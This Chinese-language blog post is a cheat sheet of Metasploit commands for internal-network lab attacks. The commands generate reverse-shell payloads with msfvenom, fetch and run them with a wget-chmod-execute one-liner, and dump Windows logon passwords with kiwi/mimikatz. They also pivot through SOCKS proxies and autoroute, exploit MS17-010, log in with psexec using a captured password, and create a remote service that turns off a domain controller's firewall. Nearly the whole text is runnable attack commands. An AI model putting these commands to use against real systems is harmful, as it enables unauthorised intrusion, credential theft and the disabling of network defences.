美文网首页
内网打靶知识点总结

内网打靶知识点总结

作者: migrate_ | 来源:发表于2021-08-16 16:54 被阅读0次
    msf内网主机存存活扫描
    use auxiliary/scanner/discovery/udp_probe
    set rhosts 192.168.52.1-255
    set threads 5
    run
    
    Metasploit 脚本Web传递攻击
    use exploit/multi/script/web_delivery
    show targets
    set target 7   #Linux
    show payloads
    set payload 7  #linux/x64/meterpreter/reverse_tcp
    set lhost 192.168.43.203
    run
    #复制去机器上运行
    
    meterpreter添加路由
    #meterpreter终端
    run autoroute -s 192.168.52.0/24 #添加路由
    run autoroute -p
    background
    
    生成木马
    msfvenom -p linux/x64/meterpreter/reverse_tcp lport=5555 -f elf -o shell.elf  #生成木马
    
    上传木马
    sessions 1
    upload /home/kali/shell.elf /tmp/shell.elf   #上传木马
    background
    
    监听木马上线
    use exploit/multi/handler   
    set payload linux/x64/meterpreter/reverse_tcp
    set lhost 192.168.43.203
    set lport 5555
    run
    
    目标不出网,从同网段的肉鸡上下载木马
    #192.168.52.10终端(肉鸡开始web服务)
    python3 -m http.server                           
    #192.168.52.20终端(shell,下载木马上线msf)
    wget http://192.168.52.10:8000/shell.elf;chmod +x shell.elf;./shell.elf 
    
    内网读取hash

    如果机器是x64系统(必须先注入x64的进程才能运行)

    ps              #找到x64的进程pid
    migrate 1614    #注入到64位的程序
    load kiwi       #运行程序
    kiwi_cmd privilege::debug   #提升权限
    kiwi_cmd sekurlsa::logonPasswords  # 读取密码
    -------------------------------------------------
    meterpreter > creds_tspkg
    meterpreter > kiwi_cmd -f sekurlsa::logonpasswords
    注:自动迁移进程命令:run post/windows/manage/migrate
    输入getpid查看当前PID,发现变为1416
    进程迁移完后,原先PID为236的进行会自动关闭,如未关闭可以输入kill 236 杀掉进程
    
    msf开启代理
    use auxiliary/server/socks_proxy
    set SRVHOST  0.0.0.0
    set SRVPORT  1080
    run
    
    代理运用
    proxychains rdesktop 192.168.93.20
    
    管理多个jobs
    help
    jobs
    kill 6
    
    内网打ms17_010(设置好正向或者反向payload是关键)
    先用MSF生成dll文件
    msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=443 -f dll > x64.dll
    将x64.dll放到工具目录替换原来的,MSF设置好监听
    
    psexec登陆(假如抓到了密码)如果不成功可能是防火墙的原因
    use exploit/windows/smb/psexec
    set rhosts 192.168.93.30
    set SMBUser administrator
    set SMBPass Whoami2021
    set payload windows/meterpreter/bind_tcp
    set rhost 192.168.93.30
    run
    
    控制第二层网络的Windows 7远程关闭域控的防火墙

    控制第二层网络的Windows 7与域控建立ipc连接

    meterpreter>shell
    net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"
    

    使用sc远程在域制器(192.168.93.30)上创建服务关闭防火墙

    sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
    
    sc \\192.168.93.30 start unablefirewall
    

    再次尝试执行 exploit/windows/smb/psexec 模块登录

    msf和cs联动

    metasploit与Cobaltstrike互相派生shell

    代理搭建(一)

    1.png 2.png

    代理就使用浏览器的sock4代理,ip就是服务端的,端口是是我们刚刚自定义的

    代理搭建(二)

    3.png

    把代码复制到metasploit控制台中,将metasploit中的流量引入到此socks代理

    4.png
    listen中继

    在现有机器上使用中转

    5.png 6.png

    生成木马

    7.png

    相关文章

      网友评论

          本文标题:内网打靶知识点总结

          本文链接:https://www.haomeiwen.com/subject/ibombltx.html